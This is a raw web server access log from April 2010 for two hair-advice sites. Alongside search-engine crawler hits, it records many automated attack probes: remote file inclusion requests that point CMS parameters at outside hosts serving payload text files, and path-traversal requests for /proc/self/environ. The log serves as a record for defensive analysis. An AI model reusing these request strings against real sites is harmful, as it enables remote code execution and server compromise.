209.126.254.139 - - [26/Apr/2010:00:27:14 -0700] "GET /logs/access.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.126.254.139 - - [26/Apr/2010:00:27:59 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.126.254.139 - - [26/Apr/2010:00:28:00 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.126.254.139 - - [26/Apr/2010:00:28:00 -0700] "GET /logs/access.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:00:30:53 -0700] "GET /logs/access_100201.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
123.30.181.5 - - [26/Apr/2010:00:34:13 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [26/Apr/2010:00:34:13 -0700] "GET /logs/access_100412.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [26/Apr/2010:00:34:13 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.126.254.139 - - [26/Apr/2010:00:34:56 -0700] "GET /logs/access_100419.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.112.151 - - [26/Apr/2010:00:42:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15103 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
123.30.181.5 - - [26/Apr/2010:00:42:58 -0700] "GET /logs/access_100322.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:00:43:15 -0700] "GET /logs/access_100405.log HTTP/1.1" 200 2516499 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:00:45:00 -0700] "GET /logs/access_100111.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
123.30.181.5 - - [26/Apr/2010:00:45:13 -0700] "GET /logs/access.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
123.30.181.5 - - [26/Apr/2010:00:45:13 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
123.30.181.5 - - [26/Apr/2010:00:45:13 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:00:55:46 -0700] "GET /logs/access_100322.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.195.114.22 - - [26/Apr/2010:00:56:38 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
67.195.114.22 - - [26/Apr/2010:00:56:39 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18901 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
213.251.189.204 - - [26/Apr/2010:00:56:43 -0700] "GET /board/skin/ggambo7002_board/write.php?dir=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.204 - - [26/Apr/2010:00:56:43 -0700] "GET /logs//board/skin/ggambo7002_board/write.php?dir=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.204 - - [26/Apr/2010:00:56:43 -0700] "GET /logs/access.log%20%20//board/skin/ggambo7002_board/write.php?dir=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:01:02:13 -0700] "GET /logs/scripts.log HTTP/1.1" 200 9154 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:01:05:19 -0700] "GET /logs/access_100118.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
213.251.189.204 - - [26/Apr/2010:01:06:03 -0700] "GET /logs/access.log//board/skin/ggambo7002_board/write.php?dir=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.44.51.33 - - [26/Apr/2010:01:06:38 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
72.44.51.33 - - [26/Apr/2010:01:06:39 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7697 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:01:13:07 -0700] "GET /logs/access_091207.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
220.181.94.229 - - [26/Apr/2010:01:17:52 -0700] "GET / HTTP/1.1" 200 926 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.freehairsecrets.com"
220.181.94.229 - - [26/Apr/2010:01:18:17 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:01:19:02 -0700] "GET /logs/access_100104.log HTTP/1.1" 200 553567 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:01:21:24 -0700] "GET /logs/access_100222.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
209.126.254.214 - - [26/Apr/2010:01:25:41 -0700] "GET /logs/access_100419.log//index2.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "growlonghairfast.com"
209.126.254.214 - - [26/Apr/2010:01:25:41 -0700] "GET /index2.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "growlonghairfast.com"
209.126.254.214 - - [26/Apr/2010:01:25:41 -0700] "GET /logs//index2.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "growlonghairfast.com"
209.126.254.214 - - [26/Apr/2010:01:26:03 -0700] "GET /index2.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "growlonghairfast.com"
209.126.254.214 - - [26/Apr/2010:01:26:33 -0700] "GET /logs/access_100419.log//index2.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "growlonghairfast.com"
209.126.254.214 - - [26/Apr/2010:01:26:33 -0700] "GET /index2.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "growlonghairfast.com"
209.126.254.214 - - [26/Apr/2010:01:26:33 -0700] "GET /logs//index2.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "growlonghairfast.com"
208.115.111.245 - - [26/Apr/2010:01:26:57 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [26/Apr/2010:01:26:57 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
209.126.254.214 - - [26/Apr/2010:01:28:00 -0700] "GET /logs/access.log//index2.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:01:28:43 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:01:34:45 -0700] "GET /logs/access_091019.log HTTP/1.1" 200 561992 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:01:36:30 -0700] "GET /logs/access.log HTTP/1.1" 200 108512 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
210.114.174.53 - - [26/Apr/2010:01:40:57 -0700] "GET /logs//bbs//bbs////delete_comment.php?board_skin_path=http://www.mytemple.co.kr/mart7/bbs/table/board7/upload/fid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.114.174.53 - - [26/Apr/2010:01:40:58 -0700] "GET /logs/access_100301.log//bbs//bbs////delete_comment.php?board_skin_path=http://www.mytemple.co.kr/mart7/bbs/table/board7/upload/fid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.114.174.53 - - [26/Apr/2010:01:40:58 -0700] "GET /bbs//bbs////delete_comment.php?board_skin_path=http://www.mytemple.co.kr/mart7/bbs/table/board7/upload/fid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:01:42:40 -0700] "GET /logs/access_100208.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
208.53.131.149 - - [26/Apr/2010:01:45:38 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Opera/9.00 (Windows NT 4.0; U; en)" "www.freehairsecrets.com"
208.53.131.149 - - [26/Apr/2010:01:45:38 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Opera/9.00 (Windows NT 4.0; U; en)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:01:49:06 -0700] "GET /logs/access_100215.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:01:49:07 -0700] "GET /logs/access_091012.log HTTP/1.1" 200 766310 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
67.208.91.30 - - [26/Apr/2010:01:51:37 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.hhse.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.208.91.30 - - [26/Apr/2010:01:51:37 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.hhse.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.208.91.30 - - [26/Apr/2010:01:51:53 -0700] "GET /logs/access.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.hhse.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:01:55:02 -0700] "GET /logs/access_100329.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
96.249.250.110 - - [26/Apr/2010:02:00:21 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.freehairsecrets.com"
96.249.250.110 - - [26/Apr/2010:02:00:21 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:02:01:22 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:02:03:22 -0700] "GET /logs/access_091102.log HTTP/1.1" 200 696678 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
67.208.91.30 - - [26/Apr/2010:02:06:13 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.hhse.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.208.91.30 - - [26/Apr/2010:02:06:13 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.hhse.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.208.91.30 - - [26/Apr/2010:02:06:30 -0700] "GET /logs/access.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.hhse.biz/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:02:07:38 -0700] "GET /logs/access_090928.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:02:08:56 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:02:08:57 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:02:08:57 -0700] "GET /logs/access.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:02:10:37 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:02:10:37 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:02:10:37 -0700] "GET /logs/access.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.112.151 - - [26/Apr/2010:02:10:38 -0700] "GET /?N=D HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.112.151 - - [26/Apr/2010:02:12:42 -0700] "GET /?N=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:02:13:20 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:02:16:40 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 2199574 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.92.94.85 - - [26/Apr/2010:02:17:57 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://77.92.94.85/echos.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
77.92.94.85 - - [26/Apr/2010:02:17:57 -0700] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
77.92.94.85 - - [26/Apr/2010:02:17:57 -0700] "GET /logs/access_100322.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
77.92.94.85 - - [26/Apr/2010:02:18:01 -0700] "GET /logs/access_091012.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:02:18:32 -0700] "GET /logs/access_091109.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
220.181.7.18 - - [26/Apr/2010:02:20:50 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:02:23:44 -0700] "GET /logs/access_091228.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
212.227.141.53 - - [26/Apr/2010:02:26:47 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.227.141.53 - - [26/Apr/2010:02:26:47 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.227.141.53 - - [26/Apr/2010:02:26:47 -0700] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.227.141.53 - - [26/Apr/2010:02:27:08 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.227.141.53 - - [26/Apr/2010:02:27:08 -0700] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.227.141.53 - - [26/Apr/2010:02:27:08 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:02:28:08 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:02:28:40 -0700] "GET /logs/access_091116.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:02:29:37 -0700] "GET /logs/access_091130.log HTTP/1.1" 200 674055 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
193.107.48.3 - - [26/Apr/2010:02:33:19 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:02:33:19 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:02:33:19 -0700] "GET /logs/access.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:02:33:57 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:02:34:04 -0700] "GET /logs/access_100315.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:02:35:52 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:02:35:52 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:02:35:52 -0700] "GET /logs/access_100412.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
193.107.48.3 - - [26/Apr/2010:02:39:01 -0700] "GET /forum//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:02:39:01 -0700] "GET /logs/forum//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:02:39:11 -0700] "GET /logs/access.log%20%20/forum//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:02:40:57 -0700] "GET /logs/ HTTP/1.1" 200 4942 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:02:41:29 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
193.107.48.3 - - [26/Apr/2010:02:41:29 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
193.107.48.3 - - [26/Apr/2010:02:41:29 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:02:42:21 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:02:42:21 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:02:42:22 -0700] "GET /logs/access_100412.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:02:44:56 -0700] "GET /logs/access_091228.log HTTP/1.1" 200 636872 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
78.110.50.121 - - [26/Apr/2010:02:47:19 -0700] "GET /write_update.php?board_skin_path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.121 - - [26/Apr/2010:02:47:35 -0700] "GET /logs//write_update.php?board_skin_path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.121 - - [26/Apr/2010:02:47:35 -0700] "GET /logs/access_100315.log%20%20//write_update.php?board_skin_path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.175.215.106 - - [26/Apr/2010:02:48:15 -0700] "GET /Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:02:48:17 -0700] "GET /logs/access_091019.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
213.175.215.106 - - [26/Apr/2010:02:48:19 -0700] "GET /Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
78.110.50.121 - - [26/Apr/2010:02:50:28 -0700] "GET /write_update.php?board_skin_path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.121 - - [26/Apr/2010:02:50:45 -0700] "GET /logs/access_100315.log%20%20//write_update.php?board_skin_path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.121 - - [26/Apr/2010:02:50:45 -0700] "GET /logs//write_update.php?board_skin_path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:02:54:52 -0700] "GET /logs/access_091123.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:02:56:43 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:02:56:43 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:02:56:48 -0700] "GET /logs/access_100329.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
